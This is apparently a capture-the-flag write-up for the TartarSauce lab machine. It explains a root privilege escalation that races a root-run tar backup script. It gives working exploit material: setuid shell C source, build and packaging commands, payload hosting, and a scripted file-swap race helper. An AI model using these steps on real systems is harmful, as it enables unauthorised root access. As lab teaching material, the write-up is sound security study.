# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi

The script is not run by a cron job; it runs on a systemd timer every 5 minutes.

systemctl list-timers
WARNING: terminal is not fully functional
-  (press RETURN)
NEXT                         LEFT          LAST                         PASSED  
Tue 2022-03-29 08:00:41 EDT  1min 29s left Tue 2022-03-29 07:55:41 EDT  3min 30s
Tue 2022-03-29 20:23:27 EDT  12h left      Mon 2022-03-28 20:23:27 EDT  11h ago 
Tue 2022-03-29 22:11:52 EDT  14h left      Tue 2022-03-29 06:24:25 EDT  1h 34min
Wed 2022-03-30 06:45:48 EDT  22h left      Tue 2022-03-29 06:30:28 EDT  1h 28min

The script is a bit dense, so let's walk through it step by step.

basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
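The only non-obvious assignment is $tmpfile: its name is simply the SHA-1 of 100 random bytes with a leading dot, which we can reproduce locally:

```shell
# Reproduces the script's tmpfile naming: .<40-hex-char sha1>
tmpname=".$(head -c100 /dev/urandom | sha1sum | cut -d' ' -f1)"
echo "$tmpname"    # e.g. .dbd2d8bf96339d3e8b21aa3a7eba9f4228416e46
```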

Step 1: Delete the hidden temp files and the check folder from the last run.

/bin/rm -rf $tmpdir/.* $check

/bin/rm -rf /var/tmp/.* /var/tmp/check

Step 2: Create a gzipped tar archive of the base folder (/var/www/html), as user onuma, in the background.

/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

/usr/bin/sudo -u onuma /bin/tar -zcvf /var/tmp/.<random-sha1> /var/www/html &

Step 3: Sleep for 30 seconds so the backup can complete.

/bin/sleep 30

Step 4: Integrity check of the backup. The tar file is extracted with tar -zxvf into a new "check" folder under the temp folder (/var/tmp), and the extracted tree is compared against the actual folder with diff -r.

integrity_chk() { /usr/bin/diff -r $basedir $check$basedir }

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check

With the variables expanded:

integrity_chk() { /usr/bin/diff -r /var/www/html /var/tmp/check/var/www/html }

/bin/mkdir /var/tmp/check
/bin/tar -zxvf /var/tmp/.<random-sha1> -C /var/tmp/check

To understand it better, I ran pspy again in a different session to watch the script work.

2022/03/28 20:04:48 CMD: UID=0    PID=30172  | /usr/bin/printf - 
2022/03/28 20:04:48 CMD: UID=0    PID=30146  | /bin/bash /usr/sbin/backuperer 
2022/03/28 20:04:48 CMD: UID=0    PID=30131  | /bin/bash /usr/sbin/backuperer 
2022/03/28 20:04:48 CMD: UID=0    PID=30227  | /bin/sleep 30 
2022/03/28 20:04:48 CMD: UID=0    PID=30226  | /usr/bin/sudo -u onuma /bin/tar -zcvf /var/tmp/.dbd2d8bf96339d3e8b21aa3a7eba9f4228416e46 /var/www/html 
2022/03/28 20:04:48 CMD: UID=1000 PID=30231  | gzip 
2022/03/28 20:04:48 CMD: UID=1000 PID=30230  | /bin/tar -zcvf /var/tmp/.dbd2d8bf96339d3e8b21aa3a7eba9f4228416e46 /var/www/html 
2022/03/28 20:05:18 CMD: UID=0    PID=30237  | gzip -d 
2022/03/28 20:05:18 CMD: UID=0    PID=30236  | /bin/tar -zxvf /var/tmp/.dbd2d8bf96339d3e8b21aa3a7eba9f4228416e46 -C /var/tmp/check 
2022/03/28 20:05:19 CMD: UID=0    PID=30239  | /usr/bin/diff -r /var/www/html /var/tmp/check/var/www/html 
2022/03/28 20:05:19 CMD: UID=0    PID=30238  | /bin/bash /usr/sbin/backuperer 
2022/03/28 20:05:20 CMD: UID=0    PID=30242  | 

As soon as you see the process below, a check folder is created under /var/tmp:

2022/03/28 20:55:13 CMD: UID=1000 PID=31592  | /bin/tar -zcvf /var/tmp/.decccf21841a356aaf2f7ecc8df83607ad746805 /var/www/html 
2022/03/28 20:55:43 CMD: UID=0    PID=31605  | gzip -d 
2022/03/28 20:55:43 CMD: UID=0    PID=31604  | /bin/tar -zxvf /var/tmp/.decccf21841a356aaf2f7ecc8df83607ad746805 -C /var/tmp/check 

However, we have only about 30 seconds before it gets deleted:

2022/03/28 20:55:43 CMD: UID=0    PID=31604  | /bin/tar -zxvf /var/tmp/.decccf21841a356aaf2f7ecc8df83607ad746805 -C /var/tmp/check 
2022/03/28 20:55:45 CMD: UID=0    PID=31608  | /usr/bin/diff -r /var/www/html /var/tmp/check/var/www/html 
2022/03/28 20:55:45 CMD: UID=0    PID=31607  | /bin/bash /usr/sbin/backuperer 
2022/03/28 20:55:45 CMD: UID=0    PID=31610  | /bin/rm -rf /var/tmp/check . .. 

2022/03/29 03:03:16 CMD: UID=1000 PID=9087   | /bin/tar -zcvf /var/tmp/.8209fd97375aeaaa3d57ace7881a250e6ec84b82 /var/www/html 
2022/03/29 03:03:16 CMD: UID=0    PID=9084   | /bin/sleep 30 
2022/03/29 03:03:16 CMD: UID=0    PID=9083   | /usr/bin/sudo -u onuma /bin/tar -zcvf /var/tmp/.8209fd97375aeaaa3d57ace7881a250e6ec84b82 /var/www/html 
2022/03/29 03:03:46 CMD: UID=0    PID=9094   | gzip -d 
2022/03/29 03:03:46 CMD: UID=0    PID=9093   | /bin/tar -zxvf /var/tmp/.8209fd97375aeaaa3d57ace7881a250e6ec84b82 -C /var/tmp/check 
2022/03/29 03:03:47 CMD: UID=0    PID=9096   | /usr/bin/diff -r /var/www/html /var/tmp/check/var/www/html 
2022/03/29 03:03:47 CMD: UID=0    PID=9095   | /bin/bash /usr/sbin/backuperer 
2022/03/29 03:03:47 CMD: UID=0    PID=9098   | /bin/rm -rf /var/tmp/check . .. 

I could see the check folder with the ls command, but could not list its contents before it was removed. You have to be fast.

onuma@TartarSauce:/var/tmp$
ls
ls
systemd-private-46248d8045bf434cba7dc7496b9776d4-systemd-timesyncd.service-en3PkS
systemd-private-4e3fb5c5d5a044118936f5728368dfc7-systemd-timesyncd.service-SksmwR
systemd-private-e11430f63fc04ed6bd67ec90687cb00e-systemd-timesyncd.service-PYhxgX
ls
ls
check
systemd-private-46248d8045bf434cba7dc7496b9776d4-systemd-timesyncd.service-en3PkS
cd check
cd check
bash: cd: check: No such file or directory
ls -al
ls -al
total 40
drwxrwxrwt 10 root root 4096 Mar 28 20:55 .
drwxr-xr-x 14 root root 4096 Feb  9  2018 ..
drwx------  3 root root 4096 Feb 17  2018 systemd-private-46248d8045bf434cba7dc7496b9776d4-systemd-timesyncd.service-en3PkS
drwx------  3 root root 4096 May 29  2020 systemd-private-4e3fb5c5d5a044118936f5728368dfc7-systemd-timesyncd.service-SksmwR
drwx------  3 root root 4096 Feb 17  2018 systemd-private-7bbf46014a364159a9c6b4b5d58af33b-systemd-timesyncd.se

The plan is to place our own archive under /var/tmp/ and swap it in for the backup file while the script runs. Once the program executes, a "check" folder is created, and we have about 30 seconds from that point to execute our payload from inside it.

I used [a simple C program](Rchitect/rchitect.c at Yoda · tcprks/Rchitect · GitHub) to spawn a shell and compiled it on the Kali machine:

cat rchitect.c       
#include <stdio.h>
#include <stdlib.h>   /* for system() */
#include <unistd.h>   /* for setuid()/setgid() */

int main (void) {
    setuid(0); setgid(0);   /* become root once the setuid bit is honoured */
    system("/bin/sh");
    return 0;
}
┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ gcc -m32 -o rchitectbash rchitect.c                              
In file included from rchitect.c:1:
/usr/include/stdio.h:27:10: fatal error: bits/libc-header-start.h: No such file or directory
   27 | #include <bits/libc-header-start.h>
      |          ^~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.

The error indicates that the 32-bit development headers are missing. Installing the multilib packages fixed the issue:

sudo apt-get install gcc-multilib g\+\+-multilib

Compile the program, recreate the target's directory layout, set the setuid/setgid bits, and create a tar file as below:

 sudo gcc -m32 rchitect.c -o rchitectbash   


┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ ls -al rchitectbash                                                                                                                                                 2 ⨯
-rwxr-xr-x 1 root root 15188 Mar 28 21:31 rchitectbash

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ mkdir -p var/www/html

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ mv rchitectbash var/www/html/   


┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ sudo chown root.root -R var           

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ sudo chmod 6555 var/www/html/rchitectbash 

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ 

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ ls -al var/www/html 
total 24
drwxr-xr-x 2 root root  4096 Mar 28 21:34 .
drwxr-xr-x 3 root root  4096 Mar 28 21:33 ..
-r-sr-sr-x 1 root root 15188 Mar 28 21:31 rchitectbash

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ tar -zcvf rchitectbash.tar.gz var/    
var/
var/www/
var/www/html/
var/www/html/rchitectbash
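It's worth confirming the archive really recorded the setuid/setgid bits, since root's extraction on the target restores whatever modes tar stored. A self-contained check with a dummy payload file, so the commands run anywhere:

```shell
# tar records the full mode bits; -tvf lists them without extracting.
mkdir -p demo/var/www/html
touch demo/var/www/html/payload
chmod 6555 demo/var/www/html/payload     # setuid+setgid, r-xr-xr-x
tar -zcf demo.tar.gz demo/var
tar -tvf demo.tar.gz | grep payload      # mode column reads -r-sr-sr-x
```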

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

After fetching rchitectbash.tar.gz onto the target and copying it over the random temp file during the 30-second sleep, we can see the check folder created:

ls -al
total 11292
drwxrwxrwt 11 root  root      4096 Mar 29 04:49 .
drwxr-xr-x 14 root  root      4096 Feb  9  2018 ..
-rw-r--r--  1 onuma onuma 11511673 Mar 29 04:49 .8bfa94a64fe2448a8c8ce50f4ca293fec389e03d
drwxr-xr-x  3 root  root      4096 Mar 29 04:49 check
-rw-r--r--  1 onuma onuma     2690 Mar 28 22:51 rchitectbash.tar.gz

Immediately change into the check folder (/var/tmp/check/var/www/html) and run the payload (./rchitectbash): we have the root shell.
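The race can also be scripted instead of being done by hand. A hypothetical helper sketch (the function name and polling loop are my own; /var/tmp and the hidden-dotfile naming come from backuperer itself, and timing may need tuning on the target):

```shell
# Poll for backuperer's hidden temp file and overwrite it with our archive
# during the 30-second sleep; root's extraction then plants the setuid
# payload under /var/tmp/check/var/www/html.
watch_and_swap() {
    local tmpdir="$1" payload="$2" tmpfile=""
    while [ -z "$tmpfile" ]; do
        tmpfile=$(find "$tmpdir" -maxdepth 1 -type f -name '.??*' 2>/dev/null | head -n1)
        [ -z "$tmpfile" ] && sleep 1
    done
    # NOTE: on the real target, wait until the file stops growing before
    # copying, or tar (still writing) may clobber the swap.
    cp "$payload" "$tmpfile"
    echo "swapped $tmpfile"
}
```

Usage on the box would look like `watch_and_swap /var/tmp /var/tmp/rchitectbash.tar.gz`, then once /var/tmp/check appears: `cd /var/tmp/check/var/www/html && ./rchitectbash`.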

Lessons learnt: Link to heading

Take note of rabbit holes on the server. In this case, the Monstra exploit was a rabbit hole, as we could not upload a PHP reverse shell through it.

In directory scanning, if you identify a subdirectory, always run another scan against it to enumerate the folders and files inside. In this case, we would never have identified the WordPress site without a second directory scan.

Privilege escalation was a great learning experience on this box. Understanding the behavior of the tar and diff programs is what makes this escalation work.

If you are not a programming expert, search for a simple C program that spawns a shell. I have uploaded one to my GitHub that I found through a Google search.